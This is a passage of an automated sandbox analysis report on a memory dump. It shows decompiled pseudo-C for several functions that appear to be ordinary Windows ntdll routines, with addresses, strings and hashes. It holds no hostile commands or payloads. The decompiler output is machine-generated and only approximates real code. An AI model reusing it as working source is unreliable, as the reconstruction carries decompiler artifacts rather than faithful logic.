								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0526A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L05244620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x05231b8f
0x05231b9a
0x05231b9c
0x05231b9e
0x05231ba3
0x05287010
0x05287010
0x00000000
0x05231ba9
0x05231ba9
0x05231bae
0x00000000
0x05231bc5
0x05231bca
0x05231bcf
0x05231bd0
0x05231bd1
0x05231bd2
0x05231bd6
0x05231bdc
0x05231be0
0x05286ffc
0x05287000
0x00000000
0x05287006
0x05287009
0x05287009
0x05231be6
0x05231bec
0x05231c0b
0x05231c0b
0x05231c0c
0x05231c11
0x05231c12
0x05231c15
0x05231c1b
0x05231c1f
0x05231c31
0x05231c33
0x05287026
0x05287026
0x05231c21
0x05231c24
0x05231c24
0x05231bee
0x05231bee
0x05231bf2
0x05231c3a
0x05231bf4
0x05231bf4
0x05231c05
0x05231c05
0x05231c09
0x05231c3e
0x00000000
0x00000000
0x00000000
0x05231c09
0x05231bec
0x05231be0
0x05231bae
0x05231c2e

Strings

WindowsExcludedProcs, xrefs: 05231BC5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: be409edf15f92d01eb367b915c1e03244cbffb948c6b5d58e9b2898867740987
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: D72128B7636219ABCB21EA95C844F6F776EFF40A50F194821FD099B210D634DC11C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0524F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0524F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0524f71d
0x0524f722
0x0524f726
0x05294770
0x0524f765
0x0524f769
0x0524f769
0x0524f732
0x0529477a
0x00000000
0x0529477a
0x0524f738
0x0524f73a
0x0524f73c
0x0524f73f
0x0524f746
0x0524f778
0x0524f7a9
0x0524f7a9
0x0524f754
0x0524f75a
0x0524f75d
0x0524f75f
0x0524f761
0x0524f76f
0x0524f771
0x0524f771
0x0524f76f
0x0524f763
0x00000000
0x0524f763
0x0524f77d
0x0524f7a3
0x0524f7a5
0x00000000
0x0524f7a5
0x0524f77f
0x0524f782
0x0524f784
0x0524f786
0x00000000
0x00000000
0x00000000
0x0524f788
0x0524f748
0x0524f74d
0x0524f78d
0x0524f793
0x0524f7b7
0x0524f7bc
0x00000000
0x0524f7bc
0x0524f798
0x00000000
0x00000000
0x0524f79d
0x0524f7b0
0x00000000
0x0524f7b0
0x0524f79f
0x00000000
0x0524f74f
0x0524f74f
0x00000000
0x0524f74f

Strings

Actx , xrefs: 0524F73F

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ddacb198b7bf3cfed78434f87f5526bf6a29987d20b6a08840f6185ae3be6dac
Instruction ID: 37b4efba13a284b4900477f704a058e3137f6c9c0d55a44f5a0b1737420a3d63
Opcode Fuzzy Hash: ddacb198b7bf3cfed78434f87f5526bf6a29987d20b6a08840f6185ae3be6dac
Instruction Fuzzy Hash: E11181357787038BEB2C8F1D8A90A777297BFC5624F24452AE46ACB791D6B8D8418F40

Uniqueness

Uniqueness Score: -1.00%

Function 052D8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E052D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5300d50);
				E0527D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E052B5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0527DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0527DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0527D130(_t34, _t39, _t40);
			}

0x052d8df1
0x052d8df1
0x052d8df1
0x052d8df1
0x052d8df1
0x052d8df1
0x052d8df3
0x052d8df8
0x052d8dfd
0x052d8e00
0x052d8e0e
0x052d8e2a
0x052d8e36
0x052d8e38
0x052d8e3c
0x052d8e46
0x052d8e46
0x052d8e36
0x052d8e50
0x052d8e56
0x052d8e59
0x052d8e5c
0x052d8e60
0x052d8e67
0x052d8e6d
0x052d8e73
0x052d8e74
0x052d8eb1
0x052d8ebd

Strings

Critical error detected %lx, xrefs: 052D8E21

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5ac8261bb5fc6984603310ebc6f169a44a46f79b2844f90aef120e01bb16a045
Instruction ID: bb40e635fa2cd1ff474b1502d468693fa4f9e9ab33d446b4128405a90628b24e
Opcode Fuzzy Hash: 5ac8261bb5fc6984603310ebc6f169a44a46f79b2844f90aef120e01bb16a045
Instruction Fuzzy Hash: B3113575E24348DBDF25DFA8850979DBBB1BF09314F24425EE469AB282C3744602CF24

Uniqueness

Uniqueness Score: -1.00%

Function 052BFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 052BFF60

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: e656a23f6102d5f8d462ae608d10bde9f9f085c773c1e4b244da0ee1f259b9dd
Instruction ID: 99ba798395d0ff517b4d12d7cd320f2dc06e34032b18d158df775f29ef2dc9ee
Opcode Fuzzy Hash: e656a23f6102d5f8d462ae608d10bde9f9f085c773c1e4b244da0ee1f259b9dd
Instruction Fuzzy Hash: C311CB75A30288EFEB12EF60CE49FD8BBB1FF08744F148054E4096B2A1C7799940DB50

Uniqueness

Uniqueness Score: -1.00%

Function 052F5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E052F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5301178);
				E0527D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E052F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0526D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E052F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x53160e8;
								if( *0x53160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x53160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05269710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05266DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0526F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0526F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0526F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0526FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0526FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0526F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0526F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E052F4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0527D130(_t427, _t494, _t511);
				}
			}

0x052f5ba5
